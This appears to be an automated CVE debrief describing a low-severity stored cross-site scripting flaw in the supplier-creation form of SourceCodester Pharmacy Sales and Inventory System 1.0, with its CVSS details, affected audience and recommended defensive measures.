PatchSiren cyber security CVE debrief
CVE-2026-10245 SourceCodester CVE debrief
A stored cross-site scripting (XSS) vulnerability exists in SourceCodester Pharmacy Sales and Inventory System 1.0, specifically within the create_supplier function accessible via the /ShowForm/create_supplier/main endpoint. The company_name parameter lacks sufficient input sanitization, allowing remote attackers to inject malicious scripts. The vulnerability has been assigned a LOW severity CVSS score of 2.0, reflecting the requirement for user interaction and limited impact scope. The issue was published on June 1, 2026, with exploit details publicly available. The vendor attribution remains unconfirmed with low confidence, derived from reference domain analysis pointing to Vuldb as the primary reporting source.
- Vendor
- SourceCodester
- Product
- Pharmacy Sales and Inventory System
- CVSS
- LOW 2
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-06-01
- Original CVE updated
- 2026-06-01
- Advisory published
- 2026-06-01
- Advisory updated
- 2026-06-01
Who should care
Organizations running SourceCodester Pharmacy Sales and Inventory System 1.0, particularly healthcare and pharmacy management environments. Security teams responsible for web application protection and input validation controls. Developers maintaining PHP-based inventory management systems.
Technical summary
The create_supplier function in SourceCodester Pharmacy Sales and Inventory System 1.0 fails to properly sanitize the company_name parameter, enabling stored cross-site scripting attacks. An authenticated attacker with low privileges can remotely inject malicious payloads that execute in victim browsers. The vulnerability requires user interaction and results in limited integrity impact. The CVSS 4.0 score of 2.0 reflects these constraints. The exploit has been publicly disclosed and published, increasing the risk of attempted exploitation.
Defensive priority
low
Recommended defensive actions
- Apply input validation and output encoding for the company_name parameter in the create_supplier function
- Implement Content Security Policy (CSP) headers to mitigate XSS impact
- Review and sanitize all user-supplied input in the /ShowForm/create_supplier/main endpoint
- Consider removing or restricting access to the application until patches are available
- Monitor for unauthorized access attempts to the create_supplier endpoint
- Validate that vendor attribution is confirmed before distributing internal advisories
Evidence notes
The vulnerability description is sourced from official CVE metadata and Vuldb records. The affected product is identified as SourceCodester Pharmacy Sales and Inventory System 1.0. The vulnerable function is create_supplier in /ShowForm/create_supplier/main. The attack vector is remote via manipulation of the company_name argument. CVSS 4.0 vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. Weaknesses identified as CWE-79 (Cross-site Scripting) and CWE-94 (Code Injection). Vendor confidence is low with needsReview flag set; canonical source is reference_domain_weak.
Official resources
Public disclosure occurred on 2026-06-01. Exploit details have been published and are available in public sources. No known active exploitation or ransomware campaign association has been identified.